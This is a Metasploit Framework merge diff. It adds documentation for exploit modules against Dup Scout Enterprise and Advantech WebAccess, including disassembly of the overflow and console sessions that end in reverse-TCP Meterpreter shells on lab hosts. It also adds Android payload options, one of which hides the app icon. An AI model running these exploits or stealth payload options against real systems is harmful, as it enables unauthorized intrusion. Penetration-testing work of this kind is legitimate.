Merge remote-tracking branch 'upstream/master'

Author: Tod Beardsley

Gemfile.lock

@@ -1,7 +1,7 @@
 PATH
   remote: .
   specs:
-    metasploit-framework (4.16.22)
+    metasploit-framework (4.16.23)
       actionpack (~> 4.2.6)
       activerecord (~> 4.2.6)
       activesupport (~> 4.2.6)
@@ -17,7 +17,7 @@ PATH
       metasploit-concern
       metasploit-credential
       metasploit-model
-      metasploit-payloads (= 1.3.18)
+      metasploit-payloads (= 1.3.19)
       metasploit_data_models
       metasploit_payloads-mettle (= 0.2.8)
       msgpack
@@ -138,7 +138,7 @@ GEM
       multi_json (~> 1.11)
       os (~> 0.9)
       signet (~> 0.7)
-    grpc (1.7.2)
+    grpc (1.7.3)
       google-protobuf (~> 3.1)
       googleapis-common-protos-types (~> 1.0.0)
       googleauth (>= 0.5.1, < 0.7)
@@ -178,7 +178,7 @@ GEM
       activemodel (~> 4.2.6)
       activesupport (~> 4.2.6)
       railties (~> 4.2.6)
-    metasploit-payloads (1.3.18)
+    metasploit-payloads (1.3.19)
     metasploit_data_models (2.0.15)
       activerecord (~> 4.2.6)
       activesupport (~> 4.2.6)
@@ -193,7 +193,7 @@ GEM
     method_source (0.9.0)
     mini_portile2 (2.3.0)
     minitest (5.10.3)
-    msgpack (1.1.0)
+    msgpack (1.2.0)
     multi_json (1.12.2)
     multipart-post (2.0.0)
     nessus_rest (0.1.6)

documentation/modules/auxiliary/scanner/wsdd/wsdd_query.md

@@ -0,0 +1,34 @@
+## Vulnerable Application
+
+  [Web Services Dynamic Discovery (WS-Discovery)](https://en.wikipedia.org/wiki/WS-Discovery) is a multicast discovery protocol utilising SOAP over UDP to locate web services on a local network.
+
+  Web service enabled devices typically include printers, scanners and file shares.
+
+  The reply from some devices may include optional vendor extensions. This data may include network information such as the device MAC address and hostname, or hardware information such as the serial number, make, and model.
+
+
+## Verification Steps
+
+  1. Start `msfconsole`
+  2. Do: `use auxiliary/scanner/wsdd/wsdd_query`
+  3. Do: `set RHOSTS [IP]` (Default: `239.255.255.250`)
+  4. Do: `run`
+
+
+## Scenarios
+
+  ```
+  msf > use auxiliary/scanner/wsdd/wsdd_query 
+  msf auxiliary(wsdd_query) > set rhosts 239.255.255.250
+  rhosts => 239.255.255.250
+  msf auxiliary(wsdd_query) > run
+
+  [*] Sending WS-Discovery probe to 1 hosts
+  [+] 10.1.1.184 responded with:
+  Address: http://10.1.1.184:3911/ 
+  Types: wsdp:Device, wprt:PrintDeviceType, wscn:ScanDeviceType, hpd:hpDevice
+  Vendor Extensions: {"HardwareAddress"=>"123456789ABC", "UUID"=>"12345678-1234-1234-abcd-123456789abc", "IPv4Address"=>"10.1.1.123", "Hostname"=>"HP09AAFB", "DeviceId"=>"MFG:HP;MDL:Photosmart 5520 series;DES:CX042A;", "DeviceIdentification"=>{"MakeAndModel"=>"Photosmart 5520 series", "MakeAndModelBase"=>"Photosmart 5520 series"}, "SerialNumber"=>"123456", "Services"=>" Print9100 SclScan RESTScan CIFS DOT4 LEDM", "AdapterType"=>"WifiEmbedded"}
+  [*] Scanned 1 of 1 hosts (100% complete)
+  [*] Auxiliary module execution completed
+  ```
+

documentation/modules/exploit/windows/http/dup_scout_enterprise_login_bof.md

@@ -0,0 +1,47 @@
+## Vulnerable Application
+
+  Tested on Windows 10 x64
+
+  Install the application from the link below and enable the web server by going to Tools -> Advanced Options -> Server -> Enable Web Server on Port.
+
+  [Dup Scout Enterprise v 10.0.18](https://www.exploit-db.com/apps/84dcc5fe242ca235b67ad22215fce6a8-dupscoutent_setup_v10.0.18.exe)
+
+## Verification Steps
+
+  1. Install the application and set the option above to enable the web server
+  2. Start msfconsole
+  3. Do: ```use exploit/windows/http/dup_scout_enterprise_login_bof```
+  5. Set options and payload
+  6. Do: ```run```
+  7. You should get a shell.
+
+## Options
+
+  **RHOST**
+
+  IP address of the remote host running the server.
+
+  **RPORT**
+
+  Port that the web server is running on.  Default is 80 but it can be changed when setting up the program or in the options.
+
+## Scenarios
+
+  To obtain a shell:
+
+  ```
+msf > use exploit/windows/http/dup_scout_enterprise_login_bof
+msf exploit(windows/http/dup_scout_enterprise_login_bof) > set payload windows/meterpreter/reverse_tcp
+payload => windows/meterpreter/reverse_tcp
+msf exploit(windows/http/dup_scout_enterprise_login_bof) > set rhost 192.168.1.171
+rhost => 192.168.1.171
+msf exploit(windows/http/dup_scout_enterprise_login_bof) > set lhost 192.168.1.252
+lhost => 192.168.1.252
+msf exploit(windows/http/dup_scout_enterprise_login_bof) > run
+
+[*] Started reverse TCP handler on 192.168.1.252:4444
+[*] Generating exploit...
+[*] Triggering the exploit now...
+[*] Sending stage (179779 bytes) to 192.168.1.171
+[*] Meterpreter session 1 opened (192.168.1.252:4444 -> 192.168.1.171:58969) at 2017-12-09 02:01:41 -0600
+  ```

documentation/modules/exploit/windows/scada/advantech_webaccess_webvrpcs_bof.md

@@ -0,0 +1,108 @@
+## Vulnerable Application
+
+  [Advantech WebAccess <= 8.2](http://advcloudfiles.advantech.com/web/Download/webaccess/8.2/AdvantechWebAccessUSANode8.2_20170330.exe)
+
+## Vulnerability Analysis
+
+The stack overflow happens in sub_10004BC8:
+
+```
+.text:10004BC8 ; int __cdecl sub_10004BC8(char *Format, char)
+.text:10004BC8 sub_10004BC8    proc near               ; 
+.text:10004BC8                                         ;
+.text:10004BC8
+.text:10004BC8 lpWindowName    = dword ptr -818h
+.text:10004BC8 hWnd            = dword ptr -814h
+.text:10004BC8 lpClassName     = dword ptr -810h
+.text:10004BC8 Args            = dword ptr -80Ch
+.text:10004BC8 lpBaseAddress   = dword ptr -808h
+.text:10004BC8 hFileMappingObject= dword ptr -804h
+.text:10004BC8 Dest            = byte ptr -800h
+.text:10004BC8 Format          = dword ptr  8
+.text:10004BC8 arg_4           = byte ptr  0Ch
+.text:10004BC8
+.text:10004BC8                 push    ebp
+.text:10004BC9                 mov     ebp, esp
+.text:10004BCB                 sub     esp, 818h
+.text:10004BD1                 mov     [ebp+lpWindowName], offset aDebugScreen1    ; "Debug Screen1"
+.text:10004BDB                 mov     [ebp+lpClassName], offset aDebugwclass1     ; "debugWClass1"
+.text:10004BE5                 lea     eax, [ebp+arg_4]
+.text:10004BE8                 mov     [ebp+Args], eax
+.text:10004BEE                 mov     ecx, [ebp+Args]
+.text:10004BF4                 push    ecx                                         ; Args
+.text:10004BF5                 mov     edx, [ebp+Format]
+.text:10004BF8                 push    edx                                         ; Format
+.text:10004BF9                 lea     eax, [ebp+Dest]
+.text:10004BFF                 push    eax                                         ; Dest
+.text:10004C00                 call    ds:vsprintf                                 ; overflow
+```
+
+The corresponding IDL is below:
+
+```
+[
+ uuid(5d2b62aa-ee0a-4a95-91ae-b064fdb471fc),
+ version(1.0)
+]
+
+interface target_interface
+{
+
+/* opcode: 0x01, address: 0x00401260 */
+
+void sub_401260 (
+ [in] handle_t  arg_1,
+ [in] long  arg_2,
+ [in] long  arg_3,
+ [in] long  arg_4,
+ [in][ref][size_is(arg_4)] char * arg_5,
+ [out][ref] long * arg_6
+);
+
+}
+```
+
+## Verification Steps
+
+  1. Start `msfconsole`
+  2. `use exploits/windows/scada/advantech_webaccess_webvrpcs_bof`
+  3. `set payload windows/meterpreter/reverse_tcp`
+  4. `set LHOST XXX.XXX.XXX.XXX`
+  5. `exploit`
+  6. **Verify** you get a connect back meterpreter
+
+
+## Options
+
+  None.
+
+## Scenarios
+
+  ```
+saturn:metasploit-framework mr_me$ ./msfconsole -qr scripts/advantech.rc 
+[*] Processing scripts/advantech.rc for ERB directives.
+resource (scripts/advantech.rc)> use exploit/windows/scada/advantech_webaccess_webvrpcs_bof
+resource (scripts/advantech.rc)> set payload windows/meterpreter/reverse_tcp
+payload => windows/meterpreter/reverse_tcp
+resource (scripts/advantech.rc)> set RHOST 172.16.175.136
+RHOST => 172.16.175.136
+resource (scripts/advantech.rc)> set LHOST 172.16.175.1
+LHOST => 172.16.175.1
+resource (scripts/advantech.rc)> exploit
+[*] Started reverse TCP handler on 172.16.175.1:4444 
+[*] 172.16.175.136:4592 - Binding to 5d2b62aa-ee0a-4a95-91ae-b064fdb471fc:1.0@ncacn_ip_tcp:172.16.175.136[4592] ...
+[*] 172.16.175.136:4592 - Bound to 5d2b62aa-ee0a-4a95-91ae-b064fdb471fc:1.0@ncacn_ip_tcp:172.16.175.136[4592] ...
+[+] 172.16.175.136:4592 - Got a handle: 0x01ef2558
+[*] 172.16.175.136:4592 - Trying target Windows 7 x86 - Advantech WebAccess 8.2-2017.03.31...
+[*] Sending stage (179779 bytes) to 172.16.175.136
+[*] Meterpreter session 1 opened (172.16.175.1:4444 -> 172.16.175.136:49206) at 2017-12-11 11:32:15 -0600
+[*] 172.16.175.136:4592 - The DCERPC service did not reply to our request
+
+meterpreter > shell
+Process 5208 created.
+Channel 1 created.
+Microsoft Windows [Version 6.1.7601]
+Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
+
+C:\WebAccess\Node>
+```

documentation/modules/exploit/windows/smtp/sysgauge_client_bof.md

@@ -4,7 +4,7 @@
 via its SMTP server validation. The module sends a malicious response along in the
 220 service ready response and exploits the client, resulting in an unprivileged shell.
 
-  he software is available for download from [SysGauge](http://www.sysgauge.com/setups/sysgauge_setup_v1.5.18.exe).
+  The software is available for download from [SysGauge](http://www.sysgauge.com/setups/sysgauge_setup_v1.5.18.exe).
 
 ## Verification Steps
 

lib/metasploit/framework/version.rb

@@ -30,7 +30,7 @@ def self.get_hash
         end
       end
 
-      VERSION = "4.16.22"
+      VERSION = "4.16.23"
       MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i }
       PRERELEASE = 'dev'
       HASH = get_hash

lib/msf/core/payload/android.rb

@@ -56,7 +56,12 @@ def generate_config(opts={})
     }
 
     config = Rex::Payloads::Meterpreter::Config.new(config_opts).to_b
-    config[0] = "\x01" if opts[:stageless]
+    flags = 0
+    flags |= 1 if opts[:stageless]
+    flags |= 2 if ds['AndroidMeterpreterDebug']
+    flags |= 4 if ds['AndroidWakelock']
+    flags |= 8 if ds['AndroidHideAppIcon']
+    config[0] = flags.chr
     config
   end
 

lib/msf/core/payload/android/payload_options.rb

@@ -0,0 +1,18 @@
+# -*- coding: binary -*-
+
+require 'msf/core'
+
+module Msf::Payload::Android::PayloadOptions
+
+  def initialize(info = {})
+    super(info)
+    register_advanced_options(
+      [
+        Msf::OptBool.new('AndroidMeterpreterDebug', [ false, "Run the payload in debug mode, with logging enabled" ]), 
+        Msf::OptBool.new('AndroidWakelock', [ false, "Acquire a wakelock before starting the payload" ]), 
+        Msf::OptBool.new('AndroidHideAppIcon', [ false, "Hide the application icon automatically after launch" ]), 
+      ]
+    )
+  end
+
+end

lib/msf/core/payload/android/reverse_http.rb

@@ -2,6 +2,7 @@
 
 require 'msf/core'
 require 'msf/core/payload/transport_config'
+require 'msf/core/payload/android/payload_options'
 require 'msf/core/payload/uuid/options'
 
 module Msf
@@ -16,6 +17,7 @@ module Payload::Android::ReverseHttp
 
   include Msf::Payload::TransportConfig
   include Msf::Payload::Android
+  include Msf::Payload::Android::PayloadOptions
   include Msf::Payload::UUID::Options
 
   #

lib/msf/core/payload/android/reverse_tcp.rb

@@ -2,6 +2,7 @@
 
 require 'msf/core'
 require 'msf/core/payload/transport_config'
+require 'msf/core/payload/android/payload_options'
 
 module Msf
 
@@ -15,6 +16,7 @@ module Payload::Android::ReverseTcp
 
   include Msf::Payload::TransportConfig
   include Msf::Payload::Android
+  include Msf::Payload::Android::PayloadOptions
 
   #
   # Generate the transport-specific configuration